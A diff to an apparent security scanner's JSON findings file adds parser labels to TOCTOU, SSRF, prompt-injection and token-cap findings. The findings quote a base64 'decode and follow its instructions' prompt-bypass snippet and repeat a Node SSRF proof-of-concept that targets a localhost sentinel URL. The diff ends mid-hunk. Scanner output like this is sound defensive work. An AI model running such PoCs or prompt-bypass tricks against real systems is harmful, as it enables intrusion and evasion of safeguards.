@@ -38960,6 +39221,7 @@
38960
39221
  "unvalidated": true,
38961
39222
  "cross_language": false,
38962
39223
  "family": "dos-sync-io",
39224
+ "parser": "STRUCTURAL",
38963
39225
  "_unsigned": false,
38964
39226
  "_passThroughSigning": false,
38965
39227
  "signatureStatus": "verified",
@@ -39192,6 +39454,7 @@
39192
39454
  "unvalidated": true,
39193
39455
  "cross_language": false,
39194
39456
  "family": "prototype-pollution",
39457
+ "parser": "PROTO-POLLUTION",
39195
39458
  "_unsigned": false,
39196
39459
  "_passThroughSigning": false,
39197
39460
  "signatureStatus": "verified",
@@ -39418,6 +39681,7 @@
39418
39681
  "unvalidated": true,
39419
39682
  "cross_language": false,
39420
39683
  "family": "user-input-concatenated-into-system-prom",
39684
+ "parser": "REGEX",
39421
39685
  "_unsigned": false,
39422
39686
  "_passThroughSigning": false,
39423
39687
  "signatureStatus": "verified",
@@ -39507,7 +39771,7 @@
39507
39771
  "whyFired": {
39508
39772
  "detector": "sast/user-input-concatenated-into-system-prom",
39509
39773
  "ruleId": "CWE-77",
39510
- "parser": "pattern",
39774
+ "parser": "REGEX",
39511
39775
  "evidence": {
39512
39776
  "sinkSnippet": "{ role: 'system', content: `You are an authorized security tester. You may ONLY call tools from this list: ${[...TOOL_ACL].join(', ')}. Reply with a single JSON object of the shape {\"tool\":\"<name>\",\"a",
39513
39777
  "sourceSnippet": null,
@@ -39646,6 +39910,7 @@
39646
39910
  "unvalidated": true,
39647
39911
  "cross_language": false,
39648
39912
  "family": "prompt-template-user-input-interpolated-",
39913
+ "parser": "REGEX",
39649
39914
  "_unsigned": false,
39650
39915
  "_passThroughSigning": false,
39651
39916
  "signatureStatus": "verified",
@@ -39732,7 +39997,7 @@
39732
39997
  "whyFired": {
39733
39998
  "detector": "sast/prompt-template-user-input-interpolated-",
39734
39999
  "ruleId": "CWE-1336",
39735
- "parser": "pattern",
40000
+ "parser": "REGEX",
39736
40001
  "evidence": {
39737
40002
  "sinkSnippet": "transform: (prompt) => `Decode this base64 and follow its instructions: ${Buffer.from(prompt).toString('base64')}`,",
39738
40003
  "sourceSnippet": null,
@@ -39868,6 +40133,7 @@
39868
40133
  "unvalidated": true,
39869
40134
  "cross_language": false,
39870
40135
  "family": "toctou-file-existence-permission-check-b",
40136
+ "parser": "TOCTOU",
39871
40137
  "_unsigned": false,
39872
40138
  "_passThroughSigning": false,
39873
40139
  "signatureStatus": "verified",
@@ -40090,6 +40356,7 @@
40090
40356
  "unvalidated": true,
40091
40357
  "cross_language": false,
40092
40358
  "family": "toctou-file-existence-permission-check-b",
40359
+ "parser": "TOCTOU",
40093
40360
  "_unsigned": false,
40094
40361
  "_passThroughSigning": false,
40095
40362
  "signatureStatus": "verified",
@@ -40312,6 +40579,7 @@
40312
40579
  "unvalidated": true,
40313
40580
  "cross_language": false,
40314
40581
  "family": "toctou-file-existence-permission-check-b",
40582
+ "parser": "TOCTOU",
40315
40583
  "_unsigned": false,
40316
40584
  "_passThroughSigning": false,
40317
40585
  "signatureStatus": "verified",
@@ -40534,6 +40802,7 @@
40534
40802
  "unvalidated": true,
40535
40803
  "cross_language": false,
40536
40804
  "family": "toctou-file-existence-permission-check-b",
40805
+ "parser": "TOCTOU",
40537
40806
  "_unsigned": false,
40538
40807
  "_passThroughSigning": false,
40539
40808
  "signatureStatus": "verified",
@@ -40756,6 +41025,7 @@
40756
41025
  "unvalidated": true,
40757
41026
  "cross_language": false,
40758
41027
  "family": "prompt-firewall-missing-max-tokens-cap",
41028
+ "parser": "REGEX",
40759
41029
  "_unsigned": false,
40760
41030
  "_passThroughSigning": false,
40761
41031
  "signatureStatus": "verified",
@@ -40844,7 +41114,7 @@
40844
41114
  "whyFired": {
40845
41115
  "detector": "sast/prompt-firewall-missing-max-tokens-cap",
40846
41116
  "ruleId": "CWE-400",
40847
- "parser": "pattern",
41117
+ "parser": "REGEX",
40848
41118
  "evidence": {
40849
41119
  "sinkSnippet": null,
40850
41120
  "sourceSnippet": null,
@@ -40985,6 +41255,7 @@
40985
41255
  "unvalidated": true,
40986
41256
  "cross_language": false,
40987
41257
  "family": "llm-call-without-max-tokens-unbounded-co",
41258
+ "parser": "REGEX",
40988
41259
  "_unsigned": false,
40989
41260
  "_passThroughSigning": false,
40990
41261
  "signatureStatus": "verified",
@@ -41073,7 +41344,7 @@
41073
41344
  "whyFired": {
41074
41345
  "detector": "sast/llm-call-without-max-tokens-unbounded-co",
41075
41346
  "ruleId": "CWE-770",
41076
- "parser": "pattern",
41347
+ "parser": "REGEX",
41077
41348
  "evidence": {
41078
41349
  "sinkSnippet": "// OpenAI: client.chat.completions.create({ model: \"gpt-4o-mini\", ... })",
41079
41350
  "sourceSnippet": null,
@@ -41209,6 +41480,7 @@
41209
41480
  "unvalidated": true,
41210
41481
  "cross_language": false,
41211
41482
  "family": "llm-call-without-max-tokens-unbounded-co",
41483
+ "parser": "REGEX",
41212
41484
  "_unsigned": false,
41213
41485
  "_passThroughSigning": false,
41214
41486
  "signatureStatus": "verified",
@@ -41297,7 +41569,7 @@
41297
41569
  "whyFired": {
41298
41570
  "detector": "sast/llm-call-without-max-tokens-unbounded-co",
41299
41571
  "ruleId": "CWE-770",
41300
- "parser": "pattern",
41572
+ "parser": "REGEX",
41301
41573
  "evidence": {
41302
41574
  "sinkSnippet": "// Anthropic: anthropic.messages.create({ model: \"claude-sonnet-4-6\", ... })",
41303
41575
  "sourceSnippet": null,
@@ -41433,6 +41705,7 @@
41433
41705
  "unvalidated": true,
41434
41706
  "cross_language": false,
41435
41707
  "family": "toctou-file-existence-permission-check-b",
41708
+ "parser": "TOCTOU",
41436
41709
  "_unsigned": false,
41437
41710
  "_passThroughSigning": false,
41438
41711
  "signatureStatus": "verified",
@@ -41657,6 +41930,7 @@
41657
41930
  "unvalidated": true,
41658
41931
  "cross_language": false,
41659
41932
  "family": "toctou-file-existence-permission-check-b",
41933
+ "parser": "TOCTOU",
41660
41934
  "_unsigned": false,
41661
41935
  "_passThroughSigning": false,
41662
41936
  "signatureStatus": "verified",
@@ -41879,6 +42153,7 @@
41879
42153
  "unvalidated": true,
41880
42154
  "cross_language": false,
41881
42155
  "family": "toctou-file-existence-permission-check-b",
42156
+ "parser": "TOCTOU",
41882
42157
  "_unsigned": false,
41883
42158
  "_passThroughSigning": false,
41884
42159
  "signatureStatus": "verified",
@@ -42103,6 +42378,7 @@
42103
42378
  "unvalidated": true,
42104
42379
  "cross_language": false,
42105
42380
  "family": "toctou-file-existence-permission-check-b",
42381
+ "parser": "TOCTOU",
42106
42382
  "_unsigned": false,
42107
42383
  "_passThroughSigning": false,
42108
42384
  "signatureStatus": "verified",
@@ -42327,6 +42603,7 @@
42327
42603
  "unvalidated": true,
42328
42604
  "cross_language": false,
42329
42605
  "family": "toctou-file-existence-permission-check-b",
42606
+ "parser": "TOCTOU",
42330
42607
  "_unsigned": false,
42331
42608
  "_passThroughSigning": false,
42332
42609
  "signatureStatus": "verified",
@@ -42549,15 +42826,16 @@
42549
42826
  "unvalidated": true,
42550
42827
  "cross_language": false,
42551
42828
  "family": "ssrf",
42829
+ "parser": "SSRF-METADATA",
42552
42830
  "_unsigned": false,
42553
42831
  "_passThroughSigning": false,
42554
42832
  "signatureStatus": "verified",
42555
42833
  "regression_test": {
42556
42834
  "lang": "node",
42557
- "framework": "jest",
42558
- "filename": "security_56f94fc76b59bd2b.test.mjs",
42559
- "runHint": "npx jest",
42560
- "code": "// Regression test for SSRF: explicit reference to cloud instance-metadata endpoint (CWE-918).\n// Auto-generated from P1.1 PoC; fails on vulnerable code, passes after the fix.\n\nimport { test, expect } from '@jest/globals';\n\ntest('SSRF: explicit reference to cloud instance-metadata endpoint', async () => {\n const URL_ = \"http://localhost:3000/REPLACE-WITH-ENDPOINT\";\n const METHOD = \"POST\";\n const PAYLOAD = \"http://127.0.0.1:65533/poc-ssrf-sentinel\";\n const body = METHOD === 'GET' ? null : JSON.stringify({ input: PAYLOAD });\n const reqUrl = METHOD === 'GET'\n ? URL_ + (URL_.includes('?') ? '&' : '?') + 'input=' + encodeURIComponent(PAYLOAD)\n : URL_;\n const r = await fetch(reqUrl, { method: METHOD, headers: { 'Content-Type': 'application/json' }, body });\n const text = await r.text();\n // The assertion below is the \"exploit demonstrated\" signal — when this\n // test PASSES, the vuln is still present. After the fix, this assertion\n // SHOULD fail. Inverse the assertion in a green build.\n const demonstrated = text.includes('PoC') || /syntax error/i.test(text) || text.includes('<script>');\n expect(demonstrated).toBe(false);\n});\n"
42835
+ "framework": null,
42836
+ "filename": null,
42837
+ "runHint": null,
42838
+ "code": null
42561
42839
  },
42562
42840
  "poc": {
42563
42841
  "lang": "node",
@@ -42565,7 +42843,10 @@
42565
42843
  "cwe": "CWE-918",
42566
42844
  "family": "ssrf",
42567
42845
  "runHint": "node poc.mjs",
42568
- "code": "// Demonstrates SSRF by forcing the server to fetch a localhost sentinel URL.\n// Endpoint: POST http://localhost:3000/REPLACE-WITH-ENDPOINT\n// Payload: http://127.0.0.1:65533/poc-ssrf-sentinel\n// Expect: sentinel server logs a request from the target — proves the target made an outbound call we controlled\n// Run: node poc.mjs\n// Exit code: 0 = exploit demonstrated, 1 = not demonstrated, 2 = error\n\nconst URL_ = \"http://localhost:3000/REPLACE-WITH-ENDPOINT\";\nconst METHOD = \"POST\";\nconst PAYLOAD = `http://127.0.0.1:65533/poc-ssrf-sentinel`;\n\nconst body = METHOD === 'GET'\n ? null\n : JSON.stringify({ \"input\": PAYLOAD });\n\nconst headers = { 'Content-Type': 'application/json' };\n\nconst reqUrl = METHOD === 'GET'\n ? URL_ + (URL_.includes('?') ? '&' : '?') + \"input\" + '=' + encodeURIComponent(PAYLOAD)\n : URL_;\n\ntry {\n const r = await fetch(reqUrl, { method: METHOD, headers, body, redirect: 'follow' });\n const text = await r.text();\n const sig = (text.includes(\"http://127.0.0.1:65533/poc-ssrf-sentinel\") ? 'payload reflected' : '');\n if (sig) {\n process.stderr.write('PoC: exploit demonstrated — ' + sig + '\\n');\n process.exit(0);\n }\n process.stderr.write('PoC: payload sent (status ' + r.status + '), no exploit evidence in response\\n');\n process.exit(1);\n} catch (e) {\n process.stderr.write('PoC: error reaching target — ' + e.message + '\\n');\n process.exit(2);\n}\n"
42846
+ "code": "// Demonstrates SSRF by forcing the server to fetch a localhost sentinel URL.\n// Endpoint: POST http://localhost:3000/REPLACE-WITH-ENDPOINT\n// Payload: http://127.0.0.1:65533/poc-ssrf-sentinel\n// Expect: sentinel server logs a request from the target — proves the target made an outbound call we controlled\n// Run: node poc.mjs\n// Exit code: 0 = exploit demonstrated, 1 = not demonstrated, 2 = error\n\nconst URL_ = \"http://localhost:3000/REPLACE-WITH-ENDPOINT\";\nconst METHOD = \"POST\";\nconst PAYLOAD = `http://127.0.0.1:65533/poc-ssrf-sentinel`;\n\nconst body = METHOD === 'GET'\n ? null\n : JSON.stringify({ \"input\": PAYLOAD });\n\nconst headers = { 'Content-Type': 'application/json' };\n\nconst reqUrl = METHOD === 'GET'\n ? URL_ + (URL_.includes('?') ? '&' : '?') + \"input\" + '=' + encodeURIComponent(PAYLOAD)\n : URL_;\n\ntry {\n const r = await fetch(reqUrl, { method: METHOD, headers, body, redirect: 'follow' });\n const text = await r.text();\n const sig = (text.includes(\"http://127.0.0.1:65533/poc-ssrf-sentinel\") ? 'payload reflected' : '');\n if (sig) {\n process.stderr.write('PoC: exploit demonstrated — ' + sig + '\\n');\n process.exit(0);\n }\n process.stderr.write('PoC: payload sent (status ' + r.status + '), no exploit evidence in response\\n');\n process.exit(1);\n} catch (e) {\n process.stderr.write('PoC: error reaching target — ' + e.message + '\\n');\n process.exit(2);\n}\n",
42847
+ "paramKey": null,
42848
+ "paramKeyConfidence": "low",
42849
+ "paramKeyInferred": false
42569
42850
  },
42570
42851
  "calibrated_confidence": null,
42571
42852
  "calibrated_confidence_ci": null,
@@ -42794,6 +43075,7 @@
42794
43075
  "unvalidated": true,
42795
43076
  "cross_language": false,
42796
43077
  "family": "toctou-file-existence-permission-check-b",
43078
+ "parser": "TOCTOU",
42797
43079
  "_unsigned": false,
42798
43080
  "_passThroughSigning": false,
42799
43081
  "signatureStatus": "verified",
@@ -43016,6 +43298,7 @@
43016
43298
  "unvalidated": true,
43017
43299
  "cross_language": false,
43018
43300
  "family": "toctou-file-existence-permission-check-b",
43301
+ "parser": "TOCTOU",
43019
43302
  "_unsigned": false,
43020
43303
  "_passThroughSigning": false,
43021
43304
  "signatureStatus": "verified",
@@ -43238,6 +43521,7 @@
43238
43521
  "unvalidated": true,
43239
43522
  "cross_language": false,
43240
43523
  "family": "toctou-file-existence-permission-check-b",
43524
+ "parser": "TOCTOU",
43241
43525
  "_unsigned": false,
43242
43526
  "_passThroughSigning": false,
43243
43527
  "signatureStatus": "verified",
@@ -43460,6 +43744,7 @@
43460
43744
  "unvalidated": true,
43461
43745
  "cross_language": false,
43462
43746
  "family": "toctou-file-existence-permission-check-b",
43747
+ "parser": "TOCTOU",
43463
43748
  "_unsigned": false,
43464
43749
  "_passThroughSigning": false,
43465
43750
  "signatureStatus": "verified",
@@ -43684,6 +43969,7 @@
43684
43969
  "unvalidated": true,
43685
43970
  "cross_language": false,
43686
43971
  "family": "toctou-file-existence-permission-check-b",
43972
+ "parser": "TOCTOU",
43687
43973
  "_unsigned": false,
43688
43974
  "_passThroughSigning": false,
43689
43975
  "signatureStatus": "verified",
@@ -43906,6 +44192,7 @@
43906
44192
  "unvalidated": true,
43907
44193
  "cross_language": false,
43908
44194
  "family": "toctou-file-existence-permission-check-b",
44195
+ "parser": "TOCTOU",
43909
44196
  "_unsigned": false,
43910
44197
  "_passThroughSigning": false,
43911
44198
  "signatureStatus": "verified",
@@ -44128,6 +44415,7 @@
44128
44415
  "unvalidated": true,
44129
44416
  "cross_language": false,
44130
44417
  "family": "toctou-file-existence-permission-check-b",
44418
+ "parser": "TOCTOU",
44131
44419
  "_unsigned": false,
44132
44420
  "_passThroughSigning": false,
44133
44421
  "signatureStatus": "verified",
@@ -44352,15 +44640,16 @@
44352
44640
  "unvalidated": true,
44353
44641
  "cross_language": false,
44354
44642
  "family": "ssrf",
44643
+ "parser": "SSRF-METADATA",
44355
44644
  "_unsigned": false,
44356
44645
  "_passThroughSigning": false,
44357
44646
  "signatureStatus": "verified",
44358
44647
  "regression_test": {
44359
44648
  "lang": "node",
44360
- "framework": "jest",
44361
- "filename": "security_6a315fddf4a2fb12.test.mjs",
44362
- "runHint": "npx jest",
44363
- "code": "// Regression test for SSRF: explicit reference to cloud instance-metadata endpoint (CWE-918).\n// Auto-generated from P1.1 PoC; fails on vulnerable code, passes after the fix.\n\nimport { test, expect } from '@jest/globals';\n\ntest('SSRF: explicit reference to cloud instance-metadata endpoint', async () => {\n const URL_ = \"http://localhost:3000/REPLACE-WITH-ENDPOINT\";\n const METHOD = \"POST\";\n const PAYLOAD = \"http://127.0.0.1:65533/poc-ssrf-sentinel\";\n const body = METHOD === 'GET' ? null : JSON.stringify({ input: PAYLOAD });\n const reqUrl = METHOD === 'GET'\n ? URL_ + (URL_.includes('?') ? '&' : '?') + 'input=' + encodeURIComponent(PAYLOAD)\n : URL_;\n const r = await fetch(reqUrl, { method: METHOD, headers: { 'Content-Type': 'application/json' }, body });\n const text = await r.text();\n // The assertion below is the \"exploit demonstrated\" signal — when this\n // test PASSES, the vuln is still present. After the fix, this assertion\n // SHOULD fail. Inverse the assertion in a green build.\n const demonstrated = text.includes('PoC') || /syntax error/i.test(text) || text.includes('<script>');\n expect(demonstrated).toBe(false);\n});\n"
44649
+ "framework": null,
44650
+ "filename": null,
44651
+ "runHint": null,
44652
+ "code": null
44364
44653
  },
44365
44654
  "poc": {
44366
44655
  "lang": "node",
@@ -44368,7 +44657,10 @@
44368
44657
  "cwe": "CWE-918",
44369
44658
  "family": "ssrf",
44370
44659
  "runHint": "node poc.mjs",
44371
- "code": "// Demonstrates SSRF by forcing the server to fetch a localhost sentinel URL.\n// Endpoint: POST http://localhost:3000/REPLACE-WITH-ENDPOINT\n// Payload: http://127.0.0.1:65533/poc-ssrf-sentinel\n// Expect: sentinel server logs a request from the target — proves the target made an outbound call we controlled\n// Run: node poc.mjs\n// Exit code: 0 = exploit demonstrated, 1 = not demonstrated, 2 = error\n\nconst URL_ = \"http://localhost:3000/REPLACE-WITH-ENDPOINT\";\nconst METHOD = \"POST\";\nconst PAYLOAD = `http://127.0.0.1:65533/poc-ssrf-sentinel`;\n\nconst body = METHOD === 'GET'\n ? null\n : JSON.stringify({ \"input\": PAYLOAD });\n\nconst headers = { 'Content-Type': 'application/json' };\n\nconst reqUrl = METHOD === 'GET'\n ? URL_ + (URL_.includes('?') ? '&' : '?') + \"input\" + '=' + encodeURIComponent(PAYLOAD)\n : URL_;\n\ntry {\n const r = await fetch(reqUrl, { method: METHOD, headers, body, redirect: 'follow' });\n const text = await r.text();\n const sig = (text.includes(\"http://127.0.0.1:65533/poc-ssrf-sentinel\") ? 'payload reflected' : '');\n if (sig) {\n process.stderr.write('PoC: exploit demonstrated — ' + sig + '\\n');\n process.exit(0);\n }\n process.stderr.write('PoC: payload sent (status ' + r.status + '), no exploit evidence in response\\n');\n process.exit(1);\n} catch (e) {\n process.stderr.write('PoC: error reaching target — ' + e.message + '\\n');\n process.exit(2);\n}\n"
44660
+ "code": "// Demonstrates SSRF by forcing the server to fetch a localhost sentinel URL.\n// Endpoint: POST http://localhost:3000/REPLACE-WITH-ENDPOINT\n// Payload: http://127.0.0.1:65533/poc-ssrf-sentinel\n// Expect: sentinel server logs a request from the target — proves the target made an outbound call we controlled\n// Run: node poc.mjs\n// Exit code: 0 = exploit demonstrated, 1 = not demonstrated, 2 = error\n\nconst URL_ = \"http://localhost:3000/REPLACE-WITH-ENDPOINT\";\nconst METHOD = \"POST\";\nconst PAYLOAD = `http://127.0.0.1:65533/poc-ssrf-sentinel`;\n\nconst body = METHOD === 'GET'\n ? null\n : JSON.stringify({ \"input\": PAYLOAD });\n\nconst headers = { 'Content-Type': 'application/json' };\n\nconst reqUrl = METHOD === 'GET'\n ? URL_ + (URL_.includes('?') ? '&' : '?') + \"input\" + '=' + encodeURIComponent(PAYLOAD)\n : URL_;\n\ntry {\n const r = await fetch(reqUrl, { method: METHOD, headers, body, redirect: 'follow' });\n const text = await r.text();\n const sig = (text.includes(\"http://127.0.0.1:65533/poc-ssrf-sentinel\") ? 'payload reflected' : '');\n if (sig) {\n process.stderr.write('PoC: exploit demonstrated — ' + sig + '\\n');\n process.exit(0);\n }\n process.stderr.write('PoC: payload sent (status ' + r.status + '), no exploit evidence in response\\n');\n process.exit(1);\n} catch (e) {\n process.stderr.write('PoC: error reaching target — ' + e.message + '\\n');\n process.exit(2);\n}\n",
44661
+ "paramKey": null,
44662
+ "paramKeyConfidence": "low",
44663
+ "paramKeyInferred": false
44372
44664
  },
44373
44665
  "calibrated_confidence": null,
44374
44666
  "calibrated_confidence_ci": null,
@@ -44597,6 +44889,7 @@
44597
44889
  "unvalidated": true,
44598
44890
  "cross_language": false,
44599
44891
  "family": "toctou-file-existence-permission-check-b",
44892
+ "parser": "TOCTOU",
44600
44893
  "_unsigned": false,
44601
44894
  "_passThroughSigning": false,
44602
44895
  "signatureStatus": "verified",
@@ -44819,6 +45112,7 @@
44819
45112
  "unvalidated": true,
44820
45113
  "cross_language": false,
44821
45114
  "family": "toctou-file-existence-permission-check-b",
45115
+ "parser": "TOCTOU",
44822
45116
  "_unsigned": false,
44823
45117
  "_passThroughSigning": false,
44824
45118
  "signatureStatus": "verified",
@@ -45043,6 +45337,7 @@
45043
45337
  "unvalidated": true,
45044
45338
  "cross_language": false,
45045
45339
  "family": "toctou-file-existence-permission-check-b",
45340
+ "parser": "TOCTOU",
45046
45341
  "_unsigned": false,
45047
45342
  "_passThroughSigning": false,
45048
45343
  "signatureStatus": "verified",
@@ -45265,6 +45560,7 @@
45265
45560
  "unvalidated": true,
45266
45561
  "cross_language": false,
45267
45562
  "family": "toctou-file-existence-permission-check-b",
45563
+ "parser": "TOCTOU",
45268
45564
  "_unsigned": false,
45269
45565
  "_passThroughSigning": false,
45270
45566
  "signatureStatus": "verified",
@@ -45489,6 +45785,7 @@
45489
45785
  "unvalidated": true,
45490
45786
  "cross_language": false,
45491
45787
  "family": "toctou-file-existence-permission-check-b",
45788
+ "parser": "TOCTOU",
45492
45789
  "_unsigned": false,
45493
45790
  "_passThroughSigning": false,
45494
45791
  "signatureStatus": "verified",
@@ -45713,6 +46010,7 @@
45713
46010
  "unvalidated": true,
45714
46011
  "cross_language": false,
45715
46012
  "family": "toctou-file-existence-permission-check-b",
46013
+ "parser": "TOCTOU",
45716
46014
  "_unsigned": false,
45717
46015
  "_passThroughSigning": false,
45718
46016
  "signatureStatus": "verified",
@@ -45935,6 +46233,7 @@
45935
46233
  "unvalidated": true,
45936
46234
  "cross_language": false,
45937
46235
  "family": "toctou-file-existence-permission-check-b",
46236
+ "parser": "TOCTOU",
45938
46237
  "_unsigned": false,
45939
46238
  "_passThroughSigning": false,
45940
46239
  "signatureStatus": "verified",
@@ -46157,6 +46456,7 @@
46157
46456
  "unvalidated": true,
46158
46457
  "cross_language": false,
46159
46458
  "family": "toctou-file-existence-permission-check-b",
46459
+ "parser": "TOCTOU",
46160
46460
  "_unsigned": false,
46161
46461
  "_passThroughSigning": false,
46162
46462
  "signatureStatus": "verified",
@@ -46381,6 +46681,7 @@
46381
46681
  "unvalidated": true,
46382
46682
  "cross_language": false,
46383
46683
  "family": "toctou-file-existence-permission-check-b",
46684
+ "parser": "TOCTOU",
46384
46685
  "_unsigned": false,
46385
46686
  "_passThroughSigning": false,
46386
46687
  "signatureStatus": "verified",
@@ -46605,6 +46906,7 @@
46605
46906
  "unvalidated": true,
46606
46907
  "cross_language": false,
46607
46908
  "family": "toctou-file-existence-permission-check-b",
46909
+ "parser": "TOCTOU",
46608
46910
  "_unsigned": false,
46609
46911
  "_passThroughSigning": false,
46610
46912
  "signatureStatus": "verified",
@@ -46827,6 +47129,7 @@
46827
47129
  "unvalidated": true,
46828
47130
  "cross_language": false,
46829
47131
  "family": "toctou-file-existence-permission-check-b",
47132
+ "parser": "TOCTOU",
46830
47133
  "_unsigned": false,
46831
47134
  "_passThroughSigning": false,
46832
47135
  "signatureStatus": "verified",
@@ -47049,6 +47352,7 @@
47049
47352
  "unvalidated": true,
47050
47353
  "cross_language": false,
47051
47354
  "family": "toctou-file-existence-permission-check-b",
47355
+ "parser": "TOCTOU",
47052
47356
  "_unsigned": false,
47053
47357
  "_passThroughSigning": false,
47054
47358
  "signatureStatus": "verified",
@@ -47271,6 +47575,7 @@
47271
47575
  "unvalidated": true,
47272
47576
  "cross_language": false,
47273
47577
  "family": "toctou-file-existence-permission-check-b",
47578
+ "parser": "TOCTOU",
47274
47579
  "_unsigned": false,
47275
47580
  "_passThroughSigning": false,
47276
47581
  "signatureStatus": "verified",
@@ -47495,6 +47800,7 @@
47495
47800
  "unvalidated": true,
47496
47801
  "cross_language": false,
47497
47802
  "family": "toctou-file-existence-permission-check-b",
47803
+ "parser": "TOCTOU",
47498
47804
  "_unsigned": false,
47499
47805
  "_passThroughSigning": false,
47500
47806
  "signatureStatus": "verified",
@@ -47719,6 +48025,7 @@
47719
48025
  "unvalidated": true,
47720
48026
  "cross_language": false,
47721
48027
  "family": "toctou-file-existence-permission-check-b",
48028
+ "parser": "TOCTOU",
47722
48029
  "_unsigned": false,
47723
48030
  "_passThroughSigning": false,
47724
48031
  "signatureStatus": "verified",
@@ -47943,6 +48250,7 @@
47943
48250
  "unvalidated": true,
47944
48251
  "cross_language": false,
47945
48252
  "family": "toctou-file-existence-permission-check-b",
48253
+ "parser": "TOCTOU",
47946
48254
  "_unsigned": false,
47947
48255
  "_passThroughSigning": false,
47948
48256
  "signatureStatus": "verified",
@@ -48167,6 +48475,7 @@
48167
48475
  "unvalidated": true,
48168
48476
  "cross_language": false,
48169
48477
  "family": "toctou-file-existence-permission-check-b",
48478
+ "parser": "TOCTOU",
48170
48479
  "_unsigned": false,
48171
48480
  "_passThroughSigning": false,
48172
48481
  "signatureStatus": "verified",
@@ -48391,6 +48700,7 @@
48391
48700
  "unvalidated": true,
48392
48701
  "cross_language": false,
48393
48702
  "family": "toctou-file-existence-permission-check-b",
48703
+ "parser": "TOCTOU",
48394
48704
  "_unsigned": false,
48395
48705
  "_passThroughSigning": false,
48396
48706
  "signatureStatus": "verified",
@@ -48613,6 +48923,7 @@
48613
48923
  "unvalidated": true,
48614
48924
  "cross_language": false,
48615
48925
  "family": "toctou-file-existence-permission-check-b",
48926
+ "parser": "TOCTOU",
48616
48927
  "_unsigned": false,
48617
48928
  "_passThroughSigning": false,
48618
48929
  "signatureStatus": "verified",
@@ -48835,6 +49146,7 @@
48835
49146
  "unvalidated": true,
48836
49147
  "cross_language": false,
48837
49148
  "family": "toctou-file-existence-permission-check-b",
49149
+ "parser": "TOCTOU",
48838
49150
  "_unsigned": false,
48839
49151
  "_passThroughSigning": false,
48840
49152
  "signatureStatus": "verified",
@@ -49057,6 +49369,7 @@
49057
49369
  "unvalidated": true,
49058
49370
  "cross_language": false,
49059
49371
  "family": "toctou-file-existence-permission-check-b",
49372
+ "parser": "TOCTOU",
49060
49373
  "_unsigned": false,
49061
49374
  "_passThroughSigning": false,
49062
49375
  "signatureStatus": "verified",
@@ -49281,6 +49594,7 @@
49281
49594
  "unvalidated": true,
49282
49595
  "cross_language": false,
49283
49596
  "family": "toctou-file-existence-permission-check-b",
49597
+ "parser": "TOCTOU",
49284
49598
  "_unsigned": false,
49285
49599
  "_passThroughSigning": false,
49286
49600
  "signatureStatus": "verified",
@@ -49503,6 +49817,7 @@
49503
49817
  "unvalidated": true,
49504
49818
  "cross_language": false,
49505
49819
  "family": "toctou-file-existence-permission-check-b",
49820
+ "parser": "TOCTOU",
49506
49821
  "_unsigned": false,
49507
49822
  "_passThroughSigning": false,
49508
49823
  "signatureStatus": "verified",
@@ -49725,6 +50040,7 @@
49725
50040
  "unvalidated": true,
49726
50041
  "cross_language": false,
49727
50042
  "family": "toctou-file-existence-permission-check-b",
50043
+ "parser": "TOCTOU",
49728
50044
  "_unsigned": false,
49729
50045
  "_passThroughSigning": false,
49730
50046
  "signatureStatus": "verified",
@@ -49947,15 +50263,16 @@
49947
50263
  "unvalidated": true,
49948
50264
  "cross_language": false,
49949
50265
  "family": "ssrf",
50266
+ "parser": "SSRF-METADATA",
49950
50267
  "_unsigned": false,
49951
50268
  "_passThroughSigning": false,
49952
50269
  "signatureStatus": "verified",
49953
50270
  "regression_test": {
49954
50271
  "lang": "node",
49955
- "framework": "jest",
49956
- "filename": "security_76922713e8b5ce41.test.mjs",
49957
- "runHint": "npx jest",
49958
- "code": "// Regression test for SSRF: explicit reference to cloud instance-metadata endpoint (CWE-918).\n// Auto-generated from P1.1 PoC; fails on vulnerable code, passes after the fix.\n\nimport { test, expect } from '@jest/globals';\n\ntest('SSRF: explicit reference to cloud instance-metadata endpoint', async () => {\n const URL_ = \"http://localhost:3000/REPLACE-WITH-ENDPOINT\";\n const METHOD = \"POST\";\n const PAYLOAD = \"http://127.0.0.1:65533/poc-ssrf-sentinel\";\n const body = METHOD === 'GET' ? null : JSON.stringify({ input: PAYLOAD });\n const reqUrl = METHOD === 'GET'\n ? URL_ + (URL_.includes('?') ? '&' : '?') + 'input=' + encodeURIComponent(PAYLOAD)\n : URL_;\n const r = await fetch(reqUrl, { method: METHOD, headers: { 'Content-Type': 'application/json' }, body });\n const text = await r.text();\n // The assertion below is the \"exploit demonstrated\" signal — when this\n // test PASSES, the vuln is still present. After the fix, this assertion\n // SHOULD fail. Inverse the assertion in a green build.\n const demonstrated = text.includes('PoC') || /syntax error/i.test(text) || text.includes('<script>');\n expect(demonstrated).toBe(false);\n});\n"
50272
+ "framework": null,
50273
+ "filename": null,
50274
+ "runHint": null,
50275
+ "code": null
49959
50276
  },
49960
50277
  "poc": {
49961
50278
  "lang": "node",
@@ -49963,7 +50280,10 @@
49963
50280
  "cwe": "CWE-918",
49964
50281
  "family": "ssrf",
49965
50282
  "runHint": "node poc.mjs",
49966
- "code": "// Demonstrates SSRF by forcing the server to fetch a localhost sentinel URL.\n// Endpoint: POST http://localhost:3000/REPLACE-WITH-ENDPOINT\n// Payload: http://127.0.0.1:65533/poc-ssrf-sentinel\n// Expect: sentinel server logs a request from the target — proves the target made an outbound call we controlled\n// Run: node poc.mjs\n// Exit code: 0 = exploit demonstrated, 1 = not demonstrated, 2 = error\n\nconst URL_ = \"http://localhost:3000/REPLACE-WITH-ENDPOINT\";\nconst METHOD = \"POST\";\nconst PAYLOAD = `http://127.0.0.1:65533/poc-ssrf-sentinel`;\n\nconst body = METHOD === 'GET'\n ? null\n : JSON.stringify({ \"input\": PAYLOAD });\n\nconst headers = { 'Content-Type': 'application/json' };\n\nconst reqUrl = METHOD === 'GET'\n ? URL_ + (URL_.includes('?') ? '&' : '?') + \"input\" + '=' + encodeURIComponent(PAYLOAD)\n : URL_;\n\ntry {\n const r = await fetch(reqUrl, { method: METHOD, headers, body, redirect: 'follow' });\n const text = await r.text();\n const sig = (text.includes(\"http://127.0.0.1:65533/poc-ssrf-sentinel\") ? 'payload reflected' : '');\n if (sig) {\n process.stderr.write('PoC: exploit demonstrated — ' + sig + '\\n');\n process.exit(0);\n }\n process.stderr.write('PoC: payload sent (status ' + r.status + '), no exploit evidence in response\\n');\n process.exit(1);\n} catch (e) {\n process.stderr.write('PoC: error reaching target — ' + e.message + '\\n');\n process.exit(2);\n}\n"
50283
